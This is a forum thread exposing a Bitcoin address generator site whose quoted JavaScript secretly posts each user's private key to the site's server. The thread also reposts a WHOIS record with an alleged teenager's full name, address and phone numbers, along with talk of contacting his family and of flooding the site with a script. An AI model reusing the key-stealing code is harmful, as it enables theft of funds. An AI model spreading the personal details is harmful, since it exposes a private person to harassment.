Author

Topic: Probable malicious site: bitcoin-address.org (Read 1596 times)

legendary
Activity: 1274
Merit: 1004
How come there is no citi-bank.com where I would be asked to log in?
are you serious?
Again, none of them use TLD with "citi" and "bank" in its name. Otherwise they wouldn't have to try all the tricks to spoof or mask the actual link. Trademarking "bitcoin" would make phishing harder and less effective.

Wrong,They don't do because stealing money from banks isn't easy.
Plus there are several TLD's available for registration.

Take a Look at this thread.

https://bitcointalk.org/index.php?topic=219284.0;topicseen
hero member
Activity: 756
Merit: 501
There is more to Bitcoin than bitcoins.
How come there is no citi-bank.com where I would be asked to log in?
are you serious?
Again, none of them use TLD with "citi" and "bank" in its name. Otherwise they wouldn't have to try all the tricks to spoof or mask the actual link. Trademarking "bitcoin" would make phishing harder and less effective, as it opens the perpetrators to additional legal risk.
hero member
Activity: 630
Merit: 500
Bitgoblin
How come there is no citi-bank.com where I would be asked to log in?
are you serious?
hero member
Activity: 756
Merit: 501
There is more to Bitcoin than bitcoins.
I wonder how many newcomers step in dogshit like this on their first step, and turn away for good. It would be much better for everyone if bitcoin was trademarked by any entity that is at least more trustworthy than the average person on this planet.
Very wrong: even if it was trademarked, scam sites could still pop-up, and since they are likely already illegal anyway, they wouldn't care about the trademark and do it anyway.

It's like DRM: legit business would be hurt, while criminals would be unaffected.


How come there is no citi-bank.com where I would be asked to log in?
hero member
Activity: 630
Merit: 500
Bitgoblin
I wonder how many newcomers step in dogshit like this on their first step, and turn away for good. It would be much better for everyone if bitcoin was trademarked by any entity that is at least more trustworthy than the average person on this planet.
Very wrong: even if it was trademarked, scam sites could still pop-up, and since they are likely already illegal anyway, they wouldn't care about the trademark and do it anyway.

It's like DRM: legit business would be hurt, while criminals would be unaffected.
hero member
Activity: 756
Merit: 501
There is more to Bitcoin than bitcoins.
I wonder how many newcomers step in dogshit like this on their first step, and turn away for good. It would be much better for everyone if bitcoin was trademarked by any entity that is at least more trustworthy than the average person on this planet. I know Tibanne started working on this, but not sure how far they got.
hero member
Activity: 952
Merit: 1009
And I didn't even call his father yet...  Sad

Is your bio on him legit? Source?

Only as legit as the WHOIS entry. So there's always the possibility of someone having entered another one's adress.

In any case he deleted it now. Seems to have gotten the message.

Also he's like an hour away from where I am. So there's no problem in going there to split a neighbourly piece of cake.
full member
Activity: 238
Merit: 100
And I didn't even call his father yet...  Sad

Is your bio on him legit? Source?

I've got a copy of the website, so I'll quite happily contact his family Cheesy
hero member
Activity: 952
Merit: 1009
And I didn't even call his father yet...  Sad
full member
Activity: 238
Merit: 100
So what does the site do thats malicious?
Nothing, unless you don't mind the private key being email to the site owner which then gives them full access to any funds sent to one of their generated addresses.

Edit: Aha. Seems he has taking the site down. Hope it is because of a script I had an a loop which generated over 10,000 BTC addresses, bet his inbox is pretty full.  Cheesy
hero member
Activity: 952
Merit: 1009
Quote
Registrant Name:Jan Kuhn
Registrant Street1:Herzbachweg 22
Registrant Street2:
Registrant Street3:
Registrant City:Gelnhausen
Registrant State/Province:
Registrant Postal Code:63571
Registrant Country:DE
Registrant Phone:+49.51818553717
Registrant Phone Ext.:
Registrant FAX:+49.51818553718

That's an 18 year old chess talent living at home with his father who's a defense lawyer. At least he doesn't have to go very far when the crackdown cracks down.
newbie
Activity: 42
Merit: 0
So what does the site do thats malicious?
full member
Activity: 238
Merit: 100
I'm sure it's only for statistics  Roll Eyes
Indeed. I'm sure I can find him some marketing companies that would be very interested in them.  Cheesy

And, yet, the scammers account and his AE/shrills still remain active.  Huh
legendary
Activity: 1176
Merit: 1280
May Bitcoin be touched by his Noodly Appendage
I'm sure it's only for statistics  Roll Eyes
full member
Activity: 238
Merit: 100
Certainly seems so. There is a javascript function at the bottom of the page which seems to send the public/private key off in an email:

Code:
...
        btcaddressEmail=document.getElementById('btcaddress'+kk).innerHTML;
var privateKeyEmail=document.getElementById('btcprivwif'+kk).innerHTML;
var dataToSend=new Object();
dataToSend.btcaddressEmail=btcaddressEmail;
dataToSend.privateKeyEmail=privateKeyEmail;
sendToServer(dataToSend);

})(count);
count--;

}
}

function sendToServer(dataToSend){
$.ajax({
url:"sendEmail.php",
type:"post",
data:dataToSend,
success:function(json){
console.log(json);
console.log("DONE");
},
error:function(){
console.log("error");
}
});
}


And here's the POST headers each time a new address is generated:

Quote
Accept:*/*
Accept-Encoding:gzip,deflate,sdch
Accept-Language:en-GB,en-US;q=0.8,en;q=0.6
Connection:keep-alive
Content-Length:118
Content-Type:application/x-www-form-urlencoded; charset=UTF-8
DNT:1
Host:www.bitcoin-address.org
Origin:http://www.bitcoin-address.org
Referer:http://www.bitcoin-address.org/
User-Agent:
X-Requested-With:XMLHttpRequest
Form Dataview sourceview URL encoded
btcaddressEmail:147NH6jMB5AXBEhqF3GxyiuxAPv4MCcYHW
privateKeyEmail:5J9snkqjAQ5sB4JSm4GnsErvmoyux7dvaM5hRpiayvkoaQm2P2U



Quote
Registrant Name:Jan Kuhn
Registrant Street1:Herzbachweg 22
Registrant Street2:
Registrant Street3:
Registrant City:Gelnhausen
Registrant State/Province:
Registrant Postal Code:63571
Registrant Country:DE
Registrant Phone:+49.51818553717
Registrant Phone Ext.:
Registrant FAX:+49.51818553718
administrator
Activity: 5222
Merit: 13032
Bitcoin-address.org was being spammed by JayKEy00. It's malicious, right?
Jump to: